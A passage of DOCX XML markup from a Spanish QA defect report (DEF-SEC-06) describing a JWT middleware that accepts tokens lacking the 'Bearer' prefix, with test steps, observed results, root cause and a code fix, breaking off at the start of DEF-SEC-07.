            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Hardware y software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">PC, 16GB RAM, Intel Core i5 · Node.js 20 · Jest v29 + Supertest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sistema operativo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Navegador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Google Chrome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resolución</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1920x1080</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Comentarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Detectado en TC-SEC-04 — Seguridad OWASP A07 (Autenticación)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Nombre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Middleware JWT acepta token sin prefijo "Bearer"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">El middleware de autenticación utiliza replace() en lugar de split() para extraer el token del header Authorization. Esto permite que un token válido enviado sin el prefijo "Bearer " sea aceptado como válido, violando el estándar RFC 6750.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Encargado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Andrés Gustavo Arias Ruiz</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Prioridad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Precondiciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Backend corriendo.
2. JWT válido generado para usuario registrado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pasos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. GET /profile con Authorization: {token} (sin "Bearer " al inicio).
2. Verificar código HTTP de respuesta.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado esperado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 401 (formato de Authorization inválido).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado obtenido</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 200. El middleware acepta el token sin prefijo Bearer usando replace(). Acceso concedido.
Test [DEF-SEC-06] FALLA: expected 401, received 200.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Notas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Causa raíz: middleware de auth usa token.replace("Bearer ", "") en vez de token.split(" ")[1].
Correción: const [scheme, token] = req.headers.authorization.split(" "); if (scheme !== "Bearer") return res.status(401).json({error:"Unauthorized"});</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="C55A11" w:sz="6"/>
          <w:left w:val="single" w:color="C55A11" w:sz="6"/>
          <w:bottom w:val="single" w:color="C55A11" w:sz="6"/>
          <w:right w:val="single" w:color="C55A11" w:sz="6"/>
          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:shd w:fill="C55A11" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Reporte de Defecto: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Reporte de Defecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Código</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
